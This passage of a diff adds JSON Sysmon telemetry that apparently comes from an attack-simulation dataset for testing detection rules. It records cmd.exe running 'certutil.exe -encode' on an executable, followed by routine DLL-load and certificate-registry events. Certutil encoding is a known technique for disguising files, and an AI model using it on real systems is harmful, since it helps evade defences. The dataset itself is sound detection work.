+ "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496200016, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "command_line": "certutil.exe -encode c:\\file.exe file.txt", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 904, + "ppid": 204, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "create", + "timestamp": 131883573496310000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}", + "unique_ppid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496520000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "certutil.exe", + "image_path": "C:\\Windows\\System32\\certutil.exe", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496360000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573496830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "certcli.dll", + "image_path": "C:\\Windows\\System32\\certcli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 